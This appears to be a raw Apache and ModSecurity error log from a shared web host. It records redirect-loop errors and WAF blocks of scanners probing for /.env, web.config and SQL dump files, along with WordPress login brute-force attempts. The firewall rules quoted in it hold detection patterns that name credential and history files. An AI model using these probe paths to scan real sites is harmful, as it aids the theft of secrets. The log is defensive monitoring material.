[Tue May 26 15:37:04.229166 2026] [security2:error] [pid 724639:tid 724855] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwxxKJRbiNp3eWdT2NdAAAANs"]
[Tue May 26 15:37:04.431211 2026] [core:error] [pid 724639:tid 724673] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:04.431228 2026] [core:error] [pid 724639:tid 724673] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:04.897820 2026] [core:error] [pid 724639:tid 724682] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:04.897835 2026] [core:error] [pid 724639:tid 724682] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:05.425927 2026] [core:error] [pid 724639:tid 724692] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:05.425944 2026] [core:error] [pid 724639:tid 724692] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:06.138036 2026] [security2:error] [pid 724639:tid 724801] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwyRKJRbiNp3eWdT2N1QAAAKU"]
[Tue May 26 15:37:06.158895 2026] [core:error] [pid 724639:tid 724763] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:06.158916 2026] [core:error] [pid 724639:tid 724763] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:06.518098 2026] [core:error] [pid 724639:tid 724681] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:06.518126 2026] [core:error] [pid 724639:tid 724681] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:06.879970 2026] [core:error] [pid 724639:tid 724703] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:06.879993 2026] [core:error] [pid 724639:tid 724703] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:07.151642 2026] [security2:error] [pid 724639:tid 724795] [client 113.175.30.175:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwyhKJRbiNp3eWdT2OAAAAAJ8"]
[Tue May 26 15:37:07.207891 2026] [core:error] [pid 724639:tid 724701] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:07.207910 2026] [core:error] [pid 724639:tid 724701] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:08.097533 2026] [security2:error] [pid 724639:tid 724885] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwyxKJRbiNp3eWdT2OKAAAAPk"]
[Tue May 26 15:37:08.150500 2026] [security2:error] [pid 724639:tid 724814] [client 5.183.130.182:56931] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVwyxKJRbiNp3eWdT2OKQAAALI"], referer: https://anujtradingco.com/
[Tue May 26 15:37:08.488527 2026] [core:error] [pid 724639:tid 724736] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:08.488553 2026] [core:error] [pid 724639:tid 724736] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:08.822234 2026] [core:error] [pid 724639:tid 724698] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:08.822268 2026] [core:error] [pid 724639:tid 724698] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:09.168033 2026] [core:error] [pid 724639:tid 724713] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:09.168064 2026] [core:error] [pid 724639:tid 724713] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:09.635714 2026] [core:error] [pid 724639:tid 724667] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:09.635744 2026] [core:error] [pid 724639:tid 724667] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:10.057350 2026] [core:error] [pid 724639:tid 724732] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:10.057394 2026] [core:error] [pid 724639:tid 724732] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:10.371029 2026] [core:error] [pid 724639:tid 724712] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:10.371057 2026] [core:error] [pid 724639:tid 724712] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:11.004502 2026] [security2:error] [pid 724639:tid 724896] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwzhKJRbiNp3eWdT2OdgAAAQQ"]
[Tue May 26 15:37:11.077916 2026] [security2:error] [pid 724639:tid 724753] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.visnagar.ucdc.co.in"] [uri "/web.config"] [unique_id "ahVwzxKJRbiNp3eWdT2OiAAAlXE"]
[Tue May 26 15:37:11.407167 2026] [core:error] [pid 724639:tid 724724] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:11.407189 2026] [core:error] [pid 724639:tid 724724] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:11.704105 2026] [core:error] [pid 724639:tid 724700] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:11.704136 2026] [core:error] [pid 724639:tid 724700] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:12.143746 2026] [core:error] [pid 724639:tid 724645] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:12.143772 2026] [core:error] [pid 724639:tid 724645] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:12.548564 2026] [core:error] [pid 724639:tid 724739] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:12.548580 2026] [core:error] [pid 724639:tid 724739] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:12.854937 2026] [core:error] [pid 724639:tid 724743] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:12.854965 2026] [core:error] [pid 724639:tid 724743] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:13.343900 2026] [security2:error] [pid 724639:tid 724890] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw0BKJRbiNp3eWdT2OxwAAAP4"]
[Tue May 26 15:37:13.531739 2026] [core:error] [pid 724639:tid 724750] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:13.531770 2026] [core:error] [pid 724639:tid 724750] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:14.032508 2026] [security2:error] [pid 724639:tid 724873] [client 74.7.228.18:51626] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "keydussecurity.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVw0hKJRbiNp3eWdT2O6gAA7S4"]
[Tue May 26 15:37:14.050971 2026] [core:error] [pid 724639:tid 724652] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:14.051005 2026] [core:error] [pid 724639:tid 724652] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:14.571985 2026] [core:error] [pid 724639:tid 724758] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:14.572010 2026] [core:error] [pid 724639:tid 724758] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:14.792468 2026] [security2:error] [pid 724639:tid 724884] [client 223.123.38.127:15200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVw0hKJRbiNp3eWdT2PCQAAAPg"]
[Tue May 26 15:37:14.792598 2026] [security2:error] [pid 724639:tid 724884] [client 223.123.38.127:15200] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVw0hKJRbiNp3eWdT2PCQAAAPg"]
[Tue May 26 15:37:14.952677 2026] [security2:error] [pid 724639:tid 724784] [client 94.26.106.125:64896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVw0hKJRbiNp3eWdT2PCAAAAJQ"], referer: https://www.facebook.com/
[Tue May 26 15:37:15.111785 2026] [security2:error] [pid 724639:tid 724871] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw0hKJRbiNp3eWdT2PAwAAAOs"]
[Tue May 26 15:37:15.277094 2026] [security2:error] [pid 724639:tid 724788] [client 94.26.106.125:49422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVw0xKJRbiNp3eWdT2PFwAAAJg"]
[Tue May 26 15:37:15.497778 2026] [security2:error] [pid 724639:tid 724778] [client 35.187.13.22:43576] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "208.91.199.245"] [uri "/"] [unique_id "ahVw0xKJRbiNp3eWdT2PHAAAAI4"]
[Tue May 26 15:37:15.602701 2026] [core:error] [pid 724639:tid 724755] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:15.602725 2026] [core:error] [pid 724639:tid 724755] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:16.409990 2026] [security2:error] [pid 724639:tid 724822] [client 94.26.106.125:57145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.rokartech.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVw1BKJRbiNp3eWdT2POgAAALo"], referer: https://www.bing.com/
[Tue May 26 15:37:16.496125 2026] [core:error] [pid 724639:tid 724756] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:16.496149 2026] [core:error] [pid 724639:tid 724756] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:16.725142 2026] [security2:error] [pid 724639:tid 724785] [client 94.26.106.125:63213] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.rokartech.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVw1BKJRbiNp3eWdT2PSAAAAJU"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 15:37:16.797907 2026] [core:error] [pid 724639:tid 724661] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:16.797937 2026] [core:error] [pid 724639:tid 724661] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:17.042791 2026] [security2:error] [pid 724639:tid 724875] [client 172.98.32.28:45883] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVw1BKJRbiNp3eWdT2PSgAAAO8"]
[Tue May 26 15:37:17.110798 2026] [core:error] [pid 724639:tid 724644] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:17.110827 2026] [core:error] [pid 724639:tid 724644] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:17.681471 2026] [core:error] [pid 724639:tid 724648] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:17.681499 2026] [core:error] [pid 724639:tid 724648] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:17.722013 2026] [security2:error] [pid 724639:tid 724895] [client 94.26.106.125:55275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.rosafilms.tv.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVw1RKJRbiNp3eWdT2PZwAAAQM"], referer: https://duckduckgo.com/
[Tue May 26 15:37:18.036499 2026] [security2:error] [pid 724639:tid 724874] [client 94.26.106.125:62816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.rosafilms.tv.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVw1hKJRbiNp3eWdT2PcgAAAO4"], referer: https://www.google.com/
[Tue May 26 15:37:18.190637 2026] [security2:error] [pid 724639:tid 724646] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.visnagar.ucdc.co.in"] [uri "/database.sql"] [unique_id "ahVw1hKJRbiNp3eWdT2PfQAA6QY"]
[Tue May 26 15:37:18.472053 2026] [security2:error] [pid 724639:tid 724790] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVw1hKJRbiNp3eWdT2PdQAAAJo"]
[Tue May 26 15:37:18.491568 2026] [security2:error] [pid 724639:tid 724818] [client 176.65.139.236:45924] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/.env"] [unique_id "ahVw1hKJRbiNp3eWdT2PfwAAALY"]
[Tue May 26 15:37:18.528537 2026] [security2:error] [pid 724639:tid 724824] [client 176.65.139.232:34854] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consultrgb.com"] [uri "/.env"] [unique_id "ahVw1hKJRbiNp3eWdT2PgQAAALw"]
[Tue May 26 15:37:18.589790 2026] [security2:error] [pid 724639:tid 724871] [client 176.65.139.229:56638] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.consultrgb.moes-art.com"] [uri "/.env"] [unique_id "ahVw1hKJRbiNp3eWdT2PhQAAAOs"]
[Tue May 26 15:37:18.593982 2026] [security2:error] [pid 724639:tid 724885] [client 176.65.139.233:21922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.grcorp.moes-art.com"] [uri "/.env"] [unique_id "ahVw1hKJRbiNp3eWdT2PhgAAAPk"]
[Tue May 26 15:37:18.734201 2026] [security2:error] [pid 724639:tid 724655] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.visnagar.ucdc.co.in"] [uri "/dump.sql"] [unique_id "ahVw1hKJRbiNp3eWdT2PkAAAqA8"]
[Tue May 26 15:37:19.705694 2026] [security2:error] [pid 724639:tid 724772] [client 94.26.106.125:59461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.rosaryhh.taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVw1xKJRbiNp3eWdT2PqAAAAIg"], referer: https://www.bing.com/
[Tue May 26 15:37:20.027136 2026] [security2:error] [pid 724639:tid 724869] [client 94.26.106.125:53841] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.rosaryhh.taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVw2BKJRbiNp3eWdT2PrwAAAOk"]
[Tue May 26 15:37:20.385427 2026] [security2:error] [pid 724639:tid 724649] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.visnagar.ucdc.co.in"] [uri "/backup.sql"] [unique_id "ahVw2BKJRbiNp3eWdT2PwAAAvAk"]
